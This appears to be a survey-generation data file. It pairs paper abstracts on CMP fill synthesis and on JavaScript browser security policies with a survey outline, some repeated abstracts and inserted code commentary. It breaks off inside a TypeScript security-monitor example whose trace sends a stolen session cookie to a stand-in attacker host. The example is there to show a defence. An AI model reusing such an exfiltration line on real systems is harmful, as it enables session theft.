CMP is able to reduce topography over longer lateral distances than earlier techniques; however, CMP still suffers from pattern dependencies that result in large variation in the post-polish profile across a chip. In the STI process, insufficient polish will leave residue nitride and cause device failure, while excess dishing and erosion degrade device performance. Our group has proposed several chip-scale CMP pattern density models [1], and a methodology using designed dielectric CMP test mask to characterize CMP processes [2]. The methodology has proven helpful in understanding STI CMP; however, it has several limitations as the existing test mask primarily consists of arrays of lines and spaces of large feature size varying from 10 to 100 µm. In this paper, we present a new STI characterization mask, which consists of various rectangular, L-shape, and X-shape structures of feature sizes down to submicron. The mask is designed to study advanced STI CMP processes better, as it is more representative of real STI structures. The small feature size amplifies the effects of edge acceleration and oxide deposition bias, and thus enables us to study their impact better. Experimental data from an STI CMP process is shown to verify the methodology, and these secondary effects are explored. The new mask and data guide ongoing development of improved pattern dependent STI CMP models. --- paper_title: Nanotopography Issues in Shallow Trench Isolation CMP paper_content: As advancing technologies increase the demand for planarity in integrated circuits, nanotopography has emerged as an important concern in shallow trench isolation (STI) on wafers polished by means of chemical-mechanical planarization (CMP). Previous work has shown that nanotopography-small surface-height variations of 10-100 nm in amplitude extending across millimeter-scale lateral distances on virgin wafers-can result in CMP-induced localized thinning of surface films such as the oxides or nitrides used in STI. A contact-wear CMP model can be employed to produce maps of regions on a given starting wafer that are prone to particular STI failures, such as the lack of complete clearing of the oxide in low spots and excessive erosion of nitride layers in high spots on the wafer. Stiffer CMP pads result in increased nitride thinning. A chip-scale pattern-dependent CMP simulation shows that substantial additional dishing and erosion occur because of the overpolishing time required due to nanotopography. Projections indicate that nanotopography height specifications will likely need to decrease in order to scale with smaller feature sizes in future IC technologies. --- paper_title: Planarization And Integration Of Shallow Trench Isolation paper_content: STI process flow and planarization requirements are reviewed. An STI planarization mask was designed and utilized for test wafer patterning to investigate STI CMP planarization. Test wafers were processed through a typical STI process sequence, including trench etch, trench liner oxidation, trench-fill, and CMP. Two different CVD techniques, ozone TEOS thermal CVD and HDPCVD, were investigated for trench-fill. CMP experiments were carried out with different process parameters and consumables. Extensive CMP characterization was carried out utilizing multiple metrology techniques. The results fit the previously reported “CMP dielectric planarization” model [1, 2] quite well. 
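The "CMP dielectric planarization" model cited in the entries above is usually quoted as a closed-form relation between post-polish oxide thickness and effective pattern density. The following is only a sketch of that commonly used form, in our own notation; the exact expressions and calibration in the cited model [1, 2] may differ:

\[
z(x,y,t) =
\begin{cases}
z_0 - \dfrac{K\,t}{\rho_{\mathrm{eff}}(x,y)}, & t < \dfrac{\rho_{\mathrm{eff}}(x,y)\,z_1}{K},\\[1ex]
z_0 - z_1 - K\,t + \rho_{\mathrm{eff}}(x,y)\,z_1, & \text{otherwise},
\end{cases}
\]

where z_0 is the initial oxide thickness over raised features, z_1 the initial step height, K the blanket removal rate, and \rho_{\mathrm{eff}} the effective pattern density obtained by averaging the local layout density over a planarization length. The appearance of \rho_{\mathrm{eff}} in the denominator is what makes post-CMP topography so sensitive to layout density, and is the reason the fill strategies in the surrounding entries manipulate density rather than the polish parameters.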
--- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove the excess deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rule-based and is used with reverse etchback to attain the desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next, a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and the minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (the time window in which polishing can be stopped) to increase by 17% and the maximum final step height (the maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow.
In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Dummy feature placement for chemical-mechanical polishing uniformity in a shallow trench isolation process paper_content: Manufacturability of a design that is processed with shallow trench isolation (STI) depends on the uniformity of the chemical-mechanical polishing (CMP) step in STI. The CMP step in STI is a dual-material polish, for which all previous studies on dummy feature placement for single-material polish [3, 11, 1] are not applicable. Based on recent semi-physical models of polish pad bending [5], local polish pad compression [2, 10], and different polish rates for materials present in a dual-material polish [2, 13], this paper derives a time-dependent relation between post-CMP topography and layout pattern density for CMP in STI. Using the dependencies derived, the first formulation of dummy feature placement for CMP in STI is given as a nonlinear programming problem. An iterative approach is proposed to solve the dummy feature placement problem. Computational experience on four layouts from Motorola is given. --- paper_title: A novel CBCM method free from charge injection induced errors: investigation into the impact of floating dummy-fills on interconnect capacitance paper_content: Starting from CIEF (charge injection induced errors) CBCM (charge-based capacitance measurement), a novel CBCM method free from the errors induced by charge-injection is developed. This is used for the first time to investigate the impact of floating dummy-fills on interconnect capacitance, in practice. The impact of floating dummy-fills is confirmed to play an important role on successful circuit design. Besides, a guideline to optimize the chip performance and minimize the crosstalk by dummy pattern design is also proposed in this paper. --- paper_title: Performance-impact limited area fill synthesis paper_content: Chemical-mechanical planarization (CMP) and other manufacturing steps in every deep-submicron VLSI have varying effects on device and interconnect features, depending on the local density. To improve manufacturability and performance predictability, area fill features are inserted into the layout to improve uniformity with respect to density criteria. However, the performance impact of area fill insertion is not considered by any fill method in the literature. In this paper, we first review and develop estimates for capacitance and timing overhead of area fill insertions. 
We then give the first formulations of the Performance Impact Limited Fill (PIL-Fill) problem with the objective of either minimizing total delay impact (MDFC) or maximizing the minimum slack of all nets (MSFC), subject to inserting a given prescribed amount of fill. For the MDFC PIL-Fill problem, we describe three practical solution approaches based on Integer Linear Programming (ILP-I and ILP-II) and the Greedy method. For the MSFC PIL-Fill problem, we describe an iterated greedy method that integrates calls to an industry static timing analysis tool. We test our methods on layout testcases obtained from industry. Compared with the normal fill method of Y. Chen et al. (2002), our ILP-II method for the MDFC PIL-Fill problem achieves between 25% and 90% reduction in total weighted edge delay (roughly, a measure of the sum of node slacks) impact while maintaining ideal quality of the layout density control, and our iterated greedy method for the MSFC PIL-Fill problem also shows a significant advantage with respect to the minimum slack of nets on the post-fill layout. --- paper_title: Intelligent Fill Pattern and Extraction Methodology for SoC paper_content: Uniform pattern density of physical layers of the die, such as diffusion, poly, or metals, has a significant impact on electrical parameters of the product. At the active level, variations in pattern density across the die translate into wide distributions of punch-through or breakdown voltages. At the poly and metal levels, a non-uniform pattern density would result in poor planarity and give rise to high via resistances and poor control of the inter-layer capacitive coupling. However, at the design stage, the complex functions of SoC functional blocks do not give designers enough freedom to strictly observe a predefined set of pattern density rules. Instead, the die pattern has to be made more uniform at the die integration level, by global addition of fill features (waffles). While conceptually simple, this presents a significant technical challenge, as the criteria for this addition are often difficult to meet. The simple but time-consuming way of making pattern density uniform is based on manual drawing of dummy features over the electrical database (intellectual property, IP) of the die. A simplistic, automated approach is to add a fill pattern of fixed density until it becomes close to the target pattern density of the die. However, it may not be possible to equalize all the regions even with changes in the die architecture. In addition, this approach tends to add dummy features even if unnecessary, driving towards very high pattern density. This solution is disadvantageous for RF/analog products, whose performance can be compromised by the capacitive coupling through the waffles. The proposed methodology first evaluates the initial die pattern density and then applies an adjustable, intelligent fill of dynamic density at the block level. This way, it is possible to keep the original pattern density and work only on the areas of small density. The authors propose that the standard cell methodology should enable pre-die-level modifications of pattern density and its extraction, to ensure that all the required blocks can be placed on the product and that their parasitics are properly extracted ---
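Most of the fill-synthesis work above operates in the fixed-dissection regime: the layout is cut into tiles, every w-by-w window of tiles must respect density bounds, and fill is inserted to reduce the density variation across windows. The sketch below illustrates the mechanics with a deliberately simple greedy allocation over per-tile fill slack; the cited papers instead solve the min-variation objective exactly with linear programming (or, for STI, with formulations over both oxide and nitride densities), and the tile grid, window size, and slack values here are assumptions.

```typescript
// Greedy sketch of fixed-dissection fill insertion (the cited work uses exact LP formulations).
// d[i][j]: current feature density of tile (i, j); slack[i][j]: extra density the tile can absorb as fill.

function windowDensity(d: number[][], i: number, j: number, w: number): number {
  let sum = 0;
  for (let r = i; r < i + w; r++) {
    for (let c = j; c < j + w; c++) sum += d[r][c];
  }
  return sum / (w * w);
}

/** Scan every w-by-w window and report the extreme window densities and the emptiest window. */
function windowExtremes(d: number[][], w: number): { min: number; max: number; minI: number; minJ: number } {
  let min = Infinity, max = -Infinity, minI = 0, minJ = 0;
  for (let i = 0; i + w <= d.length; i++) {
    for (let j = 0; j + w <= d[0].length; j++) {
      const v = windowDensity(d, i, j, w);
      if (v < min) { min = v; minI = i; minJ = j; }
      if (v > max) max = v;
    }
  }
  return { min, max, minI, minJ };
}

/** Add fill in small increments to the emptiest window until the window-density spread drops below eps. */
function greedyFill(d: number[][], slack: number[][], w: number, eps: number, step = 0.01): void {
  for (let iter = 0; iter < 100_000; iter++) {
    const { min, max, minI, minJ } = windowExtremes(d, w);
    if (max - min <= eps) return; // density-variation target met
    let placed = false;
    for (let r = minI; r < minI + w && !placed; r++) {
      for (let c = minJ; c < minJ + w && !placed; c++) {
        if (slack[r][c] >= step) {
          d[r][c] += step;      // insert a small amount of fill
          slack[r][c] -= step;  // consume the tile's remaining fill capacity
          placed = true;
        }
      }
    }
    if (!placed) return; // the limiting window has no room left; an exact LP would report this as a binding constraint
  }
}
```

An exact formulation replaces the greedy loop with a variable for the fill added to each tile, constraints keeping each tile within its slack and each window within its density bounds, and an objective that minimizes the gap between the largest and smallest window densities.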
Title: CMP Fill Synthesis: A Survey of Recent Studies Section 1: INTRODUCTION Description 1: Introduce the concept of Chemical-Mechanical Polishing (CMP), its significance in planarization, and the challenges it addresses in modern lithography processes. Section 2: CMP FILL TAXONOMY, BENEFITS, AND TRADEOFFS Description 2: Discuss the taxonomy of CMP fills, their benefits, tradeoffs, and different approaches like grounded versus floating fills and their impacts on resistance and capacitance (RC) parasitics. Section 3: LAYOUT DENSITY-ANALYSIS METHODS Description 3: Review methods for analyzing layout density, both fixed and continuous dissections, and their implications for density uniformity in CMP processes. Section 4: CHARACTERIZATION AND MODELING APPROACHES FOR BACK-END-OF-LINE (BEOL) CMP PROCESSES AND CORRESPONDING FILL SYNTHESIS APPROACHES Description 4: Explore various methods for characterizing and modeling BEOL CMP processes as well as different fill-synthesis methodologies, along with their problem formulations and solutions. Section 5: CHARACTERIZATION AND MODELING TECHNIQUES FOR FRONT-END-OF-LINE (FEOL) CMP PROCESSES AND SHALLOW-TRENCH-ISOLATION (STI) FILL-INSERTION PROBLEM Description 5: Explain techniques used for FEOL CMP characterization and modeling, specifically focusing on the STI fill-insertion problems and their impact on manufacturing processes. Section 6: DESIGN-DRIVEN FILL SYNTHESIS Description 6: Introduce the concept of design-driven fill synthesis, highlighting how it attempts to optimize CMP fill insertion by considering design performance and density constraints. Section 7: SUMMARY AND FUTURE CMP-FILL-SYNTHESIS FLOWS Description 7: Provide a summary of the survey and discuss potential future directions for CMP fill synthesis methods, including integration with CMP simulation, RC extraction, and multilayer fill synthesis.
Survey on JavaScript Security Policies and their Enforcement Mechanisms in a Web Browser
8
--- paper_title: Security of Web Mashups: a Survey paper_content: Web mashups, a new web application development paradigm, combine content and services from multiple origins into a new service. Web mashups heavily depend on interaction between content from multiple origins and communication with different origins. In contradiction, mashup security relies on separation for protecting code and data. Traditional HTML techniques fail to address both the interaction/communication needs and the separation needs. This paper proposes concrete requirements for building secure mashups, divided into four categories: separation, interaction, communication and advanced behavior control. For the first three categories, all currently available techniques are discussed in light of the proposed requirements. For the last category, we present three relevant academic research results with high potential. We conclude the paper by highlighting the most applicable techniques for building secure mashups, based on functionality and standardization. We also discuss opportunities for future improvements and developments. --- paper_title: Better security and privacy for web browsers: a survey of techniques, and a new implementation paper_content: The web browser is one of the most security critical software components today. It is used to interact with a variety of important applications and services, including social networking services, e-mail services, and e-commerce and e-health applications. But the same browser is also used to visit less trustworthy sites, and it is unreasonable to make it the end-user's responsibility to "browse safely". So it is an important design goal for a browser to provide adequate privacy and security guarantees, and to make sure that potentially malicious content from one web site cannot compromise the browser, violate the user's privacy, or interfere with other web sites that the user interacts with. Hence, browser security has been a very active topic of research over the past decade, and many proposals have been made for new browser security techniques or architectures. --- paper_title: You should Better Enforce than Verify paper_content: This tutorial deals with runtime enforcement and advocates its use as an extension of runtime verification. While research efforts in runtime verification have been mainly concerned with detection of misbehaviors and acknowledgement of desired behaviors, runtime enforcement aims mainly to circumvent misbehaviors of systems and to guarantee desired behaviors. First, we propose a comparison between runtime verification and runtime enforcement. We then present previous theoretical models of runtime enforcement mechanisms and their expressive power with respect to enforcement.
Then, we overview existing work on runtime enforcement monitor synthesis. Finally, we propose some future challenges for the runtime enforcement technique. --- paper_title: You are what you include: large-scale evaluation of remote javascript inclusions paper_content: JavaScript is used by web developers to enhance the interactivity of their sites, offload work to the users' browsers and improve their sites' responsiveness and user-friendliness, making web pages feel and behave like traditional desktop applications. An important feature of JavaScript is the ability to combine multiple libraries from local and remote sources into the same page, under the same namespace. While this enables the creation of more advanced web applications, it also allows for a malicious JavaScript provider to steal data from other scripts and from the page itself. Today, when developers include remote JavaScript libraries, they trust that the remote providers will not abuse the power bestowed upon them. In this paper, we report on a large-scale crawl of more than three million pages of the top 10,000 Alexa sites, and identify the trust relationships of these sites with their library providers. We show the evolution of JavaScript inclusions over time and develop a set of metrics in order to assess the maintenance-quality of each JavaScript provider, showing that in some cases, top Internet sites trust remote providers that could be successfully compromised by determined attackers and subsequently serve malicious JavaScript. In this process, we identify four previously unknown types of vulnerabilities that attackers could use to attack popular web sites. Lastly, we review some proposed ways of protecting a web application from malicious remote scripts and show that some of them may not be as effective as previously thought. --- paper_title: Reactive non-interference for a browser model paper_content: We investigate non-interference (secure information flow) policies for web browsers, replacing or complementing the Same Origin Policy. First, we adapt a recently proposed dynamic information flow enforcement mechanism to support asynchronous I/O. We prove detailed security and precision results for this enforcement mechanism, and implement it for the Featherweight Firefox browser model. Second, we investigate three useful web browser security policies that can be enforced by our mechanism, and demonstrate their value and limitations. --- paper_title: Better security and privacy for web browsers: a survey of techniques, and a new implementation paper_content: The web browser is one of the most security critical software components today. It is used to interact with a variety of important applications and services, including social networking services, e-mail services, and e-commerce and e-health applications. But the same browser is also used to visit less trustworthy sites, and it is unreasonable to make it the end-user's responsibility to "browse safely". So it is an important design goal for a browser to provide adequate privacy and security guarantees, and to make sure that potentially malicious content from one web site cannot compromise the browser, violate the user's privacy, or interfere with other web sites that the user interacts with. Hence, browser security has been a very active topic of research over the past decade, and many proposals have been made for new browser security techniques or architectures.
In the first part of this paper, we provide a survey of some important problems and some proposed solutions. We start with a very broad view on browser security problems, and then zoom in on the issues related to the security of JavaScript scripts on the Web. We discuss three important classes of techniques: fine-grained script access control, capability-secure scripting and information flow security for scripts, focusing on techniques with a solid formal foundation. In the second part of the paper, we describe a novel implementation of one information flow security technique. We discuss how we have implemented the technique of secure multi-execution in the Mozilla Firefox browser, and we report on some preliminary experiments with this implementation. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, cannot be implemented using the current integration techniques without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: On JavaScript Malware and related threats paper_content: The term JavaScript Malware describes attacks that abuse the web browser's capabilities to execute malicious script-code within the victim's local execution context. Unlike related attacks, JavaScript Malware does not rely on security vulnerabilities in the web browser's code but instead solely utilizes legal means in respect to the applying specification documents. Such attacks can either invade the user's privacy, explore and exploit the LAN, or use the victimized browser as an attack proxy. This paper documents the state of the art concerning this class of attacks, sums up relevant protection approaches, and provides directions for future research. --- paper_title: An empirical study of privacy-violating information flows in JavaScript web applications paper_content: The dynamic nature of JavaScript web applications has given rise to the possibility of privacy violating information flows.
We present an empirical study of the prevalence of such flows on a large number of popular websites. We have (1) designed an expressive, fine-grained information flow policy language that allows us to specify and detect different kinds of privacy-violating flows in JavaScript code,(2) implemented a new rewriting-based JavaScript information flow engine within the Chrome browser, and (3) used the enhanced browser to conduct a large-scale empirical study over the Alexa global top 50,000 websites of four privacy-violating flows: cookie stealing, location hijacking, history sniffing, and behavior tracking. Our survey shows that several popular sites, including Alexa global top-100 sites, use privacy-violating flows to exfiltrate information about users' browsing behavior. Our findings show that steps must be taken to mitigate the privacy threat from covert flows in browsers. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: SessionShield: Lightweight Protection against Session Hijacking paper_content: The class of Cross-site Scripting (XSS) vulnerabilities is the most prevalent security problem in the field of Web applications. 
One of the main attack vectors used in connection with XSS is session hijacking via session identifier theft. While session hijacking is a client-side attack, the actual vulnerability resides on the server-side and, thus, has to be handled by the website's operator. In consequence, if the operator fails to address XSS, the application's users are defenseless against session hijacking attacks. In this paper we present SessionShield, a lightweight client-side protection mechanism against session hijacking that allows users to protect themselves even if a vulnerable website's operator neglects to mitigate existing XSS problems. SessionShield is based on the observation that session identifier values are not used by legitimate client-side scripts and, thus, need not be available to the scripting languages running in the browser. Our system requires no training period and imposes negligible overhead on the browser, therefore making it ideal for desktop and mobile systems. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: The Tangled Web: A Guide to Securing Modern Web Applications paper_content: "Thorough and comprehensive coverage from one of the foremost experts in browser security." --Tavis Ormandy, Google Inc. Modern web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape. In The Tangled Web, Michal Zalewski, one of the world's top browser security experts, offers a compelling narrative that explains exactly how browsers work and why they're fundamentally insecure. Rather than dispense simplistic advice on vulnerabilities, Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security. You'll learn how to: perform common but surprisingly complex tasks such as URL parsing and HTML sanitization; use modern security features like Strict Transport Security, Content Security Policy, and Cross-Origin Resource Sharing; leverage many variants of the same-origin policy to safely compartmentalize complex web applications and protect user credentials in case of XSS bugs; build mashups and embed gadgets without getting stung by the tricky frame navigation policy; and embed or host user-supplied content without running into the trap of content sniffing. For quick reference, "Security Engineering Cheat Sheets" at the end of each chapter offer ready solutions to problems you're most likely to encounter.
With coverage extending as far as planned HTML5 features, The Tangled Web will help you create secure web applications that stand the test of time. --- paper_title: Third-Party Web Tracking: Policy and Technology paper_content: In the early days of the web, content was designed and hosted by a single person, group, or organization. No longer. Webpages are increasingly composed of content from myriad unrelated "third-party" websites in the business of advertising, analytics, social networking, and more. Third-party services have tremendous value: they support free content and facilitate web innovation. But third-party services come at a privacy cost: researchers, civil society organizations, and policymakers have increasingly called attention to how third parties can track a user's browsing activities across websites. This paper surveys the current policy debate surrounding third-party web tracking and explains the relevant technology. It also presents the FourthParty web measurement platform and studies we have conducted with it. Our aim is to inform researchers with essential background and tools for contributing to public understanding and policy debates about web tracking. --- paper_title: Detecting and Defending Against Third-Party Tracking on the Web paper_content: While third-party tracking on the web has garnered much attention, its workings remain poorly understood. Our goal is to dissect how mainstream web tracking occurs in the wild. We develop a client-side method for detecting and classifying five kinds of third-party trackers based on how they manipulate browser state. We run our detection system while browsing the web and observe a rich ecosystem, with over 500 unique trackers in our measurements alone. We find that most commercial pages are tracked by multiple parties, trackers vary widely in their coverage with a small number being widely deployed, and many trackers exhibit a combination of tracking behaviors. Based on web search traces taken from AOL data, we estimate that several trackers can each capture more than 20% of a user's browsing behavior. We further assess the impact of defenses on tracking and find that no existing browser mechanisms prevent tracking by social media sites via widgets while still allowing those widgets to achieve their utility goals, which leads us to develop a new defense. To the best of our knowledge, our work is the most complete study of web tracking to date. --- paper_title: Fortifying web-based applications automatically paper_content: Browser designers create security mechanisms to help web developers protect web applications, but web developers are usually slow to use these features in web-based applications (web apps). In this paper we introduce Zan, a browser-based system for applying new browser security mechanisms to legacy web apps automatically. Our key insight is that web apps often contain enough information, via web developer source-code patterns or key properties of web-app objects, to allow the browser to infer opportunities for applying new security mechanisms to existing web apps. We apply this new concept to protect authentication cookies, prevent web apps from being framed unwittingly, and perform JavaScript object deserialization safely. We evaluate Zan on up to the 1000 most popular websites for each of the three cases. 
We find that Zan can provide complementary protection for the majority of potentially applicable websites automatically without requiring additional code from the web developers and with negligible incompatibility impact. --- paper_title: An empirical study of privacy-violating information flows in JavaScript web applications paper_content: The dynamic nature of JavaScript web applications has given rise to the possibility of privacy violating information flows. We present an empirical study of the prevalence of such flows on a large number of popular websites. We have (1) designed an expressive, fine-grained information flow policy language that allows us to specify and detect different kinds of privacy-violating flows in JavaScript code, (2) implemented a new rewriting-based JavaScript information flow engine within the Chrome browser, and (3) used the enhanced browser to conduct a large-scale empirical study over the Alexa global top 50,000 websites of four privacy-violating flows: cookie stealing, location hijacking, history sniffing, and behavior tracking. Our survey shows that several popular sites, including Alexa global top-100 sites, use privacy-violating flows to exfiltrate information about users' browsing behavior. Our findings show that steps must be taken to mitigate the privacy threat from covert flows in browsers. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3) browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3) browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features.
To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: Edit automata: enforcement mechanisms for run-time security policies paper_content: We analyze the space of security policies that can be enforced by monitoring and modifying programs at run time. Our program monitors, called edit automata, are abstract machines that examine the sequence of application program actions and transform the sequence when it deviates from a specified policy. Edit automata have a rich set of transformational powers: they may terminate an application, thereby truncating the program action stream; they may suppress undesired or dangerous actions without necessarily terminating the program; and they may also insert additional actions into the event stream. ::: ::: After providing a formal definition of edit automata, we develop a rigorous framework for reasoning about them and their cousins: truncation automata (which can only terminate applications), suppression automata (which can terminate applications and suppress individual actions), and insertion automata (which can terminate and insert). We give a set-theoretic characterization of the policies each sort of automaton can enforce, and we provide examples of policies that can be enforced by one sort of automaton but not another. 
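The enforcement models surveyed above (security automata, edit automata, enforcement of non-safety properties) all reduce, at runtime, to a state machine that observes the stream of security-relevant events emitted by the target and decides whether to let each event through, suppress it, or stop the target. A minimal TypeScript sketch of a truncation-style monitor for one illustrative policy is shown below; the event vocabulary and the policy itself are assumptions chosen for the example, not taken from the cited papers.

```typescript
// Sketch of a truncation-style security automaton: the monitor inspects each
// security-relevant event and halts the target before a policy violation occurs.
// Event names and the policy are illustrative assumptions.

type SecurityEvent =
  | { kind: "readCookie"; name: string }
  | { kind: "netSend"; url: string }
  | { kind: "other" };

interface Monitor {
  /** Returns true if the event may proceed; false means the run is truncated here. */
  step(e: SecurityEvent): boolean;
}

/** Example safety policy: once any cookie has been read, no network send is allowed. */
class NoSendAfterCookieRead implements Monitor {
  private cookieRead = false;

  step(e: SecurityEvent): boolean {
    if (e.kind === "readCookie") this.cookieRead = true;
    if (e.kind === "netSend" && this.cookieRead) return false; // a bad prefix is about to happen
    return true;
  }
}

// Driving the monitor over an event trace (in a browser this would sit between
// the script and the DOM/network APIs):
const monitor = new NoSendAfterCookieRead();
const trace: SecurityEvent[] = [
  { kind: "other" },
  { kind: "readCookie", name: "SESSIONID" },
  { kind: "netSend", url: "https://attacker.example/collect" },
];
for (const e of trace) {
  if (!monitor.step(e)) {
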